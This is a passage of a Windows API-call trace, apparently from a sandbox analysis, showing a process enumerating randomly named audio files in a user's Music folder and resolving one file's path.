[0254.884] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0897810, ftCreationTime.dwHighDateTime=0x1d5e283, ftLastAccessTime.dwLowDateTime=0xf574f8b0, ftLastAccessTime.dwHighDateTime=0x1d5e5b6, ftLastWriteTime.dwLowDateTime=0xf574f8b0, ftLastWriteTime.dwHighDateTime=0x1d5e5b6, nFileSizeHigh=0x0, nFileSizeLow=0x8c1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="_j7ZhZm76jJuFLIjsl.wav", cAlternateFileName="_J7ZHZ~1.WAV")) returned 1 [0254.885] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0897810, ftCreationTime.dwHighDateTime=0x1d5e283, ftLastAccessTime.dwLowDateTime=0xf574f8b0, ftLastAccessTime.dwHighDateTime=0x1d5e5b6, ftLastWriteTime.dwLowDateTime=0xf574f8b0, ftLastWriteTime.dwHighDateTime=0x1d5e5b6, nFileSizeHigh=0x0, nFileSizeLow=0x8c1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="_j7ZhZm76jJuFLIjsl.wav", cAlternateFileName="_J7ZHZ~1.WAV")) returned 0 [0254.885] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0254.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0254.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0254.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0254.885] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", lpFilePart=0x0) returned 0x23 [0254.885] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpFilePart=0x0) returned 0x24 [0254.885] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xda52eda0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xda52eda0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0254.885] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xda52eda0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xda52eda0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0254.885] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9ed85b0, ftCreationTime.dwHighDateTime=0x1d5db75, ftLastAccessTime.dwLowDateTime=0xf9182c20, ftLastAccessTime.dwHighDateTime=0x1d5e62f, ftLastWriteTime.dwLowDateTime=0xf9182c20, ftLastWriteTime.dwHighDateTime=0x1d5e62f, nFileSizeHigh=0x0, nFileSizeLow=0x94ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="2iawPQcoA3.mp3", cAlternateFileName="2IAWPQ~1.MP3")) returned 1 [0254.886] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf731d200, ftCreationTime.dwHighDateTime=0x1d5e123, ftLastAccessTime.dwLowDateTime=0x79de39c0, ftLastAccessTime.dwHighDateTime=0x1d5dc7c, ftLastWriteTime.dwLowDateTime=0x79de39c0, ftLastWriteTime.dwHighDateTime=0x1d5dc7c, nFileSizeHigh=0x0, nFileSizeLow=0x1166a, dwReserved0=0x0, dwReserved1=0x0, cFileName="3oLXxg5YVBLPn Li.mp3", cAlternateFileName="3OLXXG~1.MP3")) returned 1 [0254.886] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcc88910, ftCreationTime.dwHighDateTime=0x1d5dcc3, ftLastAccessTime.dwLowDateTime=0xf5b94ff0, ftLastAccessTime.dwHighDateTime=0x1d5db8a, ftLastWriteTime.dwLowDateTime=0xf5b94ff0, ftLastWriteTime.dwHighDateTime=0x1d5db8a, nFileSizeHigh=0x0, nFileSizeLow=0x729, dwReserved0=0x0, dwReserved1=0x0, cFileName="4QwfbRhVUa_.m4a", cAlternateFileName="4QWFBR~1.M4A")) returned 1 [0254.886] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x852e5090, ftCreationTime.dwHighDateTime=0x1d5e225, ftLastAccessTime.dwLowDateTime=0x431e6800, ftLastAccessTime.dwHighDateTime=0x1d5e268, ftLastWriteTime.dwLowDateTime=0x431e6800, ftLastWriteTime.dwHighDateTime=0x1d5e268, nFileSizeHigh=0x0, nFileSizeLow=0xc095, dwReserved0=0x0, dwReserved1=0x0, cFileName="bvC6V9ciRknw01.m4a", cAlternateFileName="BVC6V9~1.M4A")) returned 1 [0254.886] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5efe62e0, ftCreationTime.dwHighDateTime=0x1d5d80a, ftLastAccessTime.dwLowDateTime=0xb58ded00, ftLastAccessTime.dwHighDateTime=0x1d5d8e7, ftLastWriteTime.dwLowDateTime=0xb58ded00, ftLastWriteTime.dwHighDateTime=0x1d5d8e7, nFileSizeHigh=0x0, nFileSizeLow=0xd0f5, dwReserved0=0x0, dwReserved1=0x0, cFileName="bzYT.wav", cAlternateFileName="")) returned 1 [0254.886] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723a6f90, ftCreationTime.dwHighDateTime=0x1d5e61d, ftLastAccessTime.dwLowDateTime=0x52d2780, ftLastAccessTime.dwHighDateTime=0x1d5dfce, ftLastWriteTime.dwLowDateTime=0x52d2780, ftLastWriteTime.dwHighDateTime=0x1d5dfce, nFileSizeHigh=0x0, nFileSizeLow=0xb613, dwReserved0=0x0, dwReserved1=0x0, cFileName="C Hqa.m4a", cAlternateFileName="CHQA~1.M4A")) returned 1 [0254.969] SleepEx (dwMilliseconds=0x5, bAlertable=0) returned 0x0 [0254.979] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8c6e6c0, ftCreationTime.dwHighDateTime=0x1d5ded4, ftLastAccessTime.dwLowDateTime=0xbab154b0, ftLastAccessTime.dwHighDateTime=0x1d5dd7a, ftLastWriteTime.dwLowDateTime=0xbab154b0, ftLastWriteTime.dwHighDateTime=0x1d5dd7a, nFileSizeHigh=0x0, nFileSizeLow=0x12f30, dwReserved0=0x0, dwReserved1=0x0, cFileName="ceXLBF8czRszEr5.wav", cAlternateFileName="CEXLBF~1.WAV")) returned 1 [0254.979] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x708ea380, ftCreationTime.dwHighDateTime=0x1d5e59d, ftLastAccessTime.dwLowDateTime=0xb711d830, ftLastAccessTime.dwHighDateTime=0x1d5e0da, ftLastWriteTime.dwLowDateTime=0xb711d830, ftLastWriteTime.dwHighDateTime=0x1d5e0da, nFileSizeHigh=0x0, nFileSizeLow=0x12e98, dwReserved0=0x0, dwReserved1=0x0, cFileName="CTScNZQ V.wav", cAlternateFileName="CTSCNZ~1.WAV")) returned 1 [0254.979] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddce93b0, ftCreationTime.dwHighDateTime=0x1d5e4ee, ftLastAccessTime.dwLowDateTime=0x848fc5a0, ftLastAccessTime.dwHighDateTime=0x1d5d86c, ftLastWriteTime.dwLowDateTime=0x848fc5a0, ftLastWriteTime.dwHighDateTime=0x1d5d86c, nFileSizeHigh=0x0, nFileSizeLow=0x13237, dwReserved0=0x0, dwReserved1=0x0, cFileName="CwKk0mO1iXxCgRd3.wav", cAlternateFileName="CWKK0M~1.WAV")) returned 1 [0254.980] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce8c4620, ftCreationTime.dwHighDateTime=0x1d5db4a, ftLastAccessTime.dwLowDateTime=0x3f570a40, ftLastAccessTime.dwHighDateTime=0x1d5d969, ftLastWriteTime.dwLowDateTime=0x3f570a40, ftLastWriteTime.dwHighDateTime=0x1d5d969, nFileSizeHigh=0x0, nFileSizeLow=0x3662, dwReserved0=0x0, dwReserved1=0x0, cFileName="D _JoKaSTWq.wav", cAlternateFileName="D_JOKA~1.WAV")) returned 1 [0254.980] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0254.980] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x457d8130, ftCreationTime.dwHighDateTime=0x1d5da66, ftLastAccessTime.dwLowDateTime=0xd23d8ea0, ftLastAccessTime.dwHighDateTime=0x1d5e61c, ftLastWriteTime.dwLowDateTime=0xd23d8ea0, ftLastWriteTime.dwHighDateTime=0x1d5e61c, nFileSizeHigh=0x0, nFileSizeLow=0xdc2f, dwReserved0=0x0, dwReserved1=0x0, cFileName="dMFh PkR1ioJzNm7 N9p.m4a", cAlternateFileName="DMFHPK~1.M4A")) returned 1 [0254.980] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1bf6b50, ftCreationTime.dwHighDateTime=0x1d5e366, ftLastAccessTime.dwLowDateTime=0x48477060, ftLastAccessTime.dwHighDateTime=0x1d5e77c, ftLastWriteTime.dwLowDateTime=0x48477060, ftLastWriteTime.dwHighDateTime=0x1d5e77c, nFileSizeHigh=0x0, nFileSizeLow=0xd402, dwReserved0=0x0, dwReserved1=0x0, cFileName="eNJjT.m4a", cAlternateFileName="")) returned 1 [0254.980] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1b16830, ftCreationTime.dwHighDateTime=0x1d5e58e, ftLastAccessTime.dwLowDateTime=0xccb3b720, ftLastAccessTime.dwHighDateTime=0x1d5e090, ftLastWriteTime.dwLowDateTime=0xccb3b720, ftLastWriteTime.dwHighDateTime=0x1d5e090, nFileSizeHigh=0x0, nFileSizeLow=0x168ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="fl7Fzrs.wav", cAlternateFileName="")) returned 1 [0254.980] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2f20, ftCreationTime.dwHighDateTime=0x1d5dd8d, ftLastAccessTime.dwLowDateTime=0x4df8f5b0, ftLastAccessTime.dwHighDateTime=0x1d5dc55, ftLastWriteTime.dwLowDateTime=0x4df8f5b0, ftLastWriteTime.dwHighDateTime=0x1d5dc55, nFileSizeHigh=0x0, nFileSizeLow=0x9f9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="GnfU6Z-X0Kto7uk.m4a", cAlternateFileName="GNFU6Z~1.M4A")) returned 1 [0254.981] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf2721a0, ftCreationTime.dwHighDateTime=0x1d5dd07, ftLastAccessTime.dwLowDateTime=0x38fbf130, ftLastAccessTime.dwHighDateTime=0x1d5da4d, ftLastWriteTime.dwLowDateTime=0x38fbf130, ftLastWriteTime.dwHighDateTime=0x1d5da4d, nFileSizeHigh=0x0, nFileSizeLow=0xcca4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hn0jROsDkd.m4a", cAlternateFileName="HN0JRO~1.M4A")) returned 1 [0254.981] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c7468e0, ftCreationTime.dwHighDateTime=0x1d5de13, ftLastAccessTime.dwLowDateTime=0xa15e3d10, ftLastAccessTime.dwHighDateTime=0x1d5de52, ftLastWriteTime.dwLowDateTime=0xa15e3d10, ftLastWriteTime.dwHighDateTime=0x1d5de52, nFileSizeHigh=0x0, nFileSizeLow=0xb6d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="ilzNwr6K0-M3Kz.wav", cAlternateFileName="ILZNWR~1.WAV")) returned 1 [0254.981] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9456300, ftCreationTime.dwHighDateTime=0x1d5e336, ftLastAccessTime.dwLowDateTime=0x24ba8140, ftLastAccessTime.dwHighDateTime=0x1d5d855, ftLastWriteTime.dwLowDateTime=0x24ba8140, ftLastWriteTime.dwHighDateTime=0x1d5d855, nFileSizeHigh=0x0, nFileSizeLow=0xda2b, dwReserved0=0x0, dwReserved1=0x0, cFileName="LH4L.wav", cAlternateFileName="")) returned 1 [0254.981] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x768396b0, ftCreationTime.dwHighDateTime=0x1d5e156, ftLastAccessTime.dwLowDateTime=0xe8c4c210, ftLastAccessTime.dwHighDateTime=0x1d5d7bc, ftLastWriteTime.dwLowDateTime=0xe8c4c210, ftLastWriteTime.dwHighDateTime=0x1d5d7bc, nFileSizeHigh=0x0, nFileSizeLow=0x7c9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="M8kWkNF68au.mp3", cAlternateFileName="M8KWKN~1.MP3")) returned 1 [0254.981] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0dfa9b0, ftCreationTime.dwHighDateTime=0x1d5dc75, ftLastAccessTime.dwLowDateTime=0x5c394380, ftLastAccessTime.dwHighDateTime=0x1d5dcac, ftLastWriteTime.dwLowDateTime=0x5c394380, ftLastWriteTime.dwHighDateTime=0x1d5dcac, nFileSizeHigh=0x0, nFileSizeLow=0xbd75, dwReserved0=0x0, dwReserved1=0x0, cFileName="mqKv.mp3", cAlternateFileName="")) returned 1 [0254.982] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa633d420, ftCreationTime.dwHighDateTime=0x1d5e4ac, ftLastAccessTime.dwLowDateTime=0xf2e99e30, ftLastAccessTime.dwHighDateTime=0x1d5dc87, ftLastWriteTime.dwLowDateTime=0xf2e99e30, ftLastWriteTime.dwHighDateTime=0x1d5dc87, nFileSizeHigh=0x0, nFileSizeLow=0xdd88, dwReserved0=0x0, dwReserved1=0x0, cFileName="MynuZ6aNUi.m4a", cAlternateFileName="MYNUZ6~1.M4A")) returned 1 [0254.982] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3ad5820, ftCreationTime.dwHighDateTime=0x1d5e25a, ftLastAccessTime.dwLowDateTime=0xfee082b0, ftLastAccessTime.dwHighDateTime=0x1d5d874, ftLastWriteTime.dwLowDateTime=0xfee082b0, ftLastWriteTime.dwHighDateTime=0x1d5d874, nFileSizeHigh=0x0, nFileSizeLow=0x8aca, dwReserved0=0x0, dwReserved1=0x0, cFileName="prZy nTBKiTt3Og.mp3", cAlternateFileName="PRZYNT~1.MP3")) returned 1 [0254.982] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ff00c40, ftCreationTime.dwHighDateTime=0x1d5dda4, ftLastAccessTime.dwLowDateTime=0x6e25dc20, ftLastAccessTime.dwHighDateTime=0x1d5e535, ftLastWriteTime.dwLowDateTime=0x6e25dc20, ftLastWriteTime.dwHighDateTime=0x1d5e535, nFileSizeHigh=0x0, nFileSizeLow=0x185cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="rN62yqHdWeu.wav", cAlternateFileName="RN62YQ~1.WAV")) returned 1 [0254.982] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21f18db0, ftCreationTime.dwHighDateTime=0x1d5dfde, ftLastAccessTime.dwLowDateTime=0xf233b870, ftLastAccessTime.dwHighDateTime=0x1d5dad6, ftLastWriteTime.dwLowDateTime=0xf233b870, ftLastWriteTime.dwHighDateTime=0x1d5dad6, nFileSizeHigh=0x0, nFileSizeLow=0xf1f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="s1vqb-bDkSerJ.mp3", cAlternateFileName="S1VQB-~1.MP3")) returned 1 [0254.982] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b7a86b0, ftCreationTime.dwHighDateTime=0x1d5e7b0, ftLastAccessTime.dwLowDateTime=0x9d65e910, ftLastAccessTime.dwHighDateTime=0x1d5debb, ftLastWriteTime.dwLowDateTime=0x9d65e910, ftLastWriteTime.dwHighDateTime=0x1d5debb, nFileSizeHigh=0x0, nFileSizeLow=0x42ff, dwReserved0=0x0, dwReserved1=0x0, cFileName="Spv4lZV4QRobY.mp3", cAlternateFileName="SPV4LZ~1.MP3")) returned 1 [0254.983] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x897dce60, ftCreationTime.dwHighDateTime=0x1d5d87e, ftLastAccessTime.dwLowDateTime=0xb7c19180, ftLastAccessTime.dwHighDateTime=0x1d5e76f, ftLastWriteTime.dwLowDateTime=0xb7c19180, ftLastWriteTime.dwHighDateTime=0x1d5e76f, nFileSizeHigh=0x0, nFileSizeLow=0xfd85, dwReserved0=0x0, dwReserved1=0x0, cFileName="TeqobhMtVNMUhyZ1gwDZ.mp3", cAlternateFileName="TEQOBH~1.MP3")) returned 1 [0254.983] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x675db4d0, ftCreationTime.dwHighDateTime=0x1d5e797, ftLastAccessTime.dwLowDateTime=0xf19d7890, ftLastAccessTime.dwHighDateTime=0x1d5d939, ftLastWriteTime.dwLowDateTime=0xf19d7890, ftLastWriteTime.dwHighDateTime=0x1d5d939, nFileSizeHigh=0x0, nFileSizeLow=0x10179, dwReserved0=0x0, dwReserved1=0x0, cFileName="UNt smOIZH.m4a", cAlternateFileName="UNTSMO~1.M4A")) returned 1 [0254.983] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74f48cc0, ftCreationTime.dwHighDateTime=0x1d5db78, ftLastAccessTime.dwLowDateTime=0x83630aa0, ftLastAccessTime.dwHighDateTime=0x1d5dacb, ftLastWriteTime.dwLowDateTime=0x83630aa0, ftLastWriteTime.dwHighDateTime=0x1d5dacb, nFileSizeHigh=0x0, nFileSizeLow=0xdd82, dwReserved0=0x0, dwReserved1=0x0, cFileName="vlL8C6yl5y.mp3", cAlternateFileName="VLL8C6~1.MP3")) returned 1 [0254.983] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c00c40, ftCreationTime.dwHighDateTime=0x1d5d7d2, ftLastAccessTime.dwLowDateTime=0x988c99c0, ftLastAccessTime.dwHighDateTime=0x1d5e70d, ftLastWriteTime.dwLowDateTime=0x988c99c0, ftLastWriteTime.dwHighDateTime=0x1d5e70d, nFileSizeHigh=0x0, nFileSizeLow=0x51d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wvw9g.m4a", cAlternateFileName="")) returned 1 [0254.983] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cc643b0, ftCreationTime.dwHighDateTime=0x1d5e544, ftLastAccessTime.dwLowDateTime=0x565725a0, ftLastAccessTime.dwHighDateTime=0x1d5e25f, ftLastWriteTime.dwLowDateTime=0x565725a0, ftLastWriteTime.dwHighDateTime=0x1d5e25f, nFileSizeHigh=0x0, nFileSizeLow=0x2415, dwReserved0=0x0, dwReserved1=0x0, cFileName="wXRtldph2BF4ZYHrXn.wav", cAlternateFileName="WXRTLD~1.WAV")) returned 1 [0254.983] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19d19eb0, ftCreationTime.dwHighDateTime=0x1d5de47, ftLastAccessTime.dwLowDateTime=0xaf224320, ftLastAccessTime.dwHighDateTime=0x1d5d910, ftLastWriteTime.dwLowDateTime=0xaf224320, ftLastWriteTime.dwHighDateTime=0x1d5d910, nFileSizeHigh=0x0, nFileSizeLow=0x435a, dwReserved0=0x0, dwReserved1=0x0, cFileName="x4a2o.m4a", cAlternateFileName="")) returned 1 [0254.984] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f27d770, ftCreationTime.dwHighDateTime=0x1d5e712, ftLastAccessTime.dwLowDateTime=0xf956b170, ftLastAccessTime.dwHighDateTime=0x1d5e31e, ftLastWriteTime.dwLowDateTime=0xf956b170, ftLastWriteTime.dwHighDateTime=0x1d5e31e, nFileSizeHigh=0x0, nFileSizeLow=0x18830, dwReserved0=0x0, dwReserved1=0x0, cFileName="xfzL_V5vnmdiqX.m4a", cAlternateFileName="XFZL_V~1.M4A")) returned 1 [0254.984] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc282970, ftCreationTime.dwHighDateTime=0x1d5e692, ftLastAccessTime.dwLowDateTime=0xb0ff4460, ftLastAccessTime.dwHighDateTime=0x1d5df4e, ftLastWriteTime.dwLowDateTime=0xb0ff4460, ftLastWriteTime.dwHighDateTime=0x1d5df4e, nFileSizeHigh=0x0, nFileSizeLow=0xc499, dwReserved0=0x0, dwReserved1=0x0, cFileName="xgpNh-DmsJj0OhJzt.wav", cAlternateFileName="XGPNH-~1.WAV")) returned 1 [0254.984] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39498340, ftCreationTime.dwHighDateTime=0x1d5dfa3, ftLastAccessTime.dwLowDateTime=0xefcd0710, ftLastAccessTime.dwHighDateTime=0x1d5d975, ftLastWriteTime.dwLowDateTime=0xefcd0710, ftLastWriteTime.dwHighDateTime=0x1d5d975, nFileSizeHigh=0x0, nFileSizeLow=0xc36, dwReserved0=0x0, dwReserved1=0x0, cFileName="YfBdjdFR0JACx i.mp3", cAlternateFileName="YFBDJD~1.MP3")) returned 1 [0254.984] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b80ab80, ftCreationTime.dwHighDateTime=0x1d5da1f, ftLastAccessTime.dwLowDateTime=0x5af13f40, ftLastAccessTime.dwHighDateTime=0x1d5e464, ftLastWriteTime.dwLowDateTime=0x5af13f40, ftLastWriteTime.dwHighDateTime=0x1d5e464, nFileSizeHigh=0x0, nFileSizeLow=0x4ffb, dwReserved0=0x0, dwReserved1=0x0, cFileName="YN vq4wn RqkXdR.mp3", cAlternateFileName="YNVQ4W~1.MP3")) returned 1 [0254.985] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0897810, ftCreationTime.dwHighDateTime=0x1d5e283, ftLastAccessTime.dwLowDateTime=0xf574f8b0, ftLastAccessTime.dwHighDateTime=0x1d5e5b6, ftLastWriteTime.dwLowDateTime=0xf574f8b0, ftLastWriteTime.dwHighDateTime=0x1d5e5b6, nFileSizeHigh=0x0, nFileSizeLow=0x8c1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="_j7ZhZm76jJuFLIjsl.wav", cAlternateFileName="_J7ZHZ~1.WAV")) returned 1 [0254.985] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0254.985] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0254.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0254.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0254.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0254.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0254.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0254.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0254.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0254.986] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.016] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3oLXxg5YVBLPn Li.mp3", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3oLXxg5YVBLPn Li.mp3", lpFilePart=0x0) returned 0x38 [0255.016] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0255.016] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.016] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0255.016] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0255.016] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 